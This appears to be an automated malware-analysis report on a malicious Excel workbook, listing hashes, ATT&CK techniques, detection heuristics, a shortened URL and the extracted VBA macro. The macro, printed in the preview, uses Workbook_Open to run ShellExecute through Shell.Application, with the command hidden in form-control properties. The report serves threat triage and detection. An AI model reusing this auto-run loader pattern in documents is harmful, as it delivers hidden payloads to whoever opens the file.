Office (OOXML) malware analysis — malicious · a0265e99a50445e9

MALICIOUS

Office (OOXML)

19.8 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-09-15

MD5: 08047505858518ee00f65750b4570ef2 SHA-1: eb35c627ed0795d04e1100e0311e987454b6e361 SHA-256: a0265e99a50445e960776aba088f29552a2830b8da3635b4818ebe3e3e85e044

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes the CreateObject function to instantiate 'Shell.Application', which is then used to execute an arbitrary command. The specific command executed is not fully discernible due to obfuscation, but the intent is to run a payload. This is a common technique for delivering malware via malicious Office documents.

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://www.bitly.com/jasdojasdokkakasdasasddsd In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1774 bytes
SHA-256: `ee80f32b25348b4db66eca5ba61cc81d16f21ccff268f13c4104668f017e0430`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub _ Workbook_Open _ () Sheet1.coomon.ShellExecute# hehe.mm.ControlTipText, hehe.mm.Tag End _ Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function _ coomon _ () Set _ coomon _ = _ VBA _ . _ CreateObject("Shell.Application") End Function Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "hehe" Attribute VB_Base = "0{2E174F06-FAA5-47F7-B5D8-AB84117B085C}{567020CF-06F0-4979-890E-05A863BA89A6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	24576 bytes
SHA-256: `0fd905f969e359db4b046e73aa3ee5e2973fd30c08dfbf57f92bcac1e87d322e`

Open this report in the interactive analyzer, or submit your own file for analysis.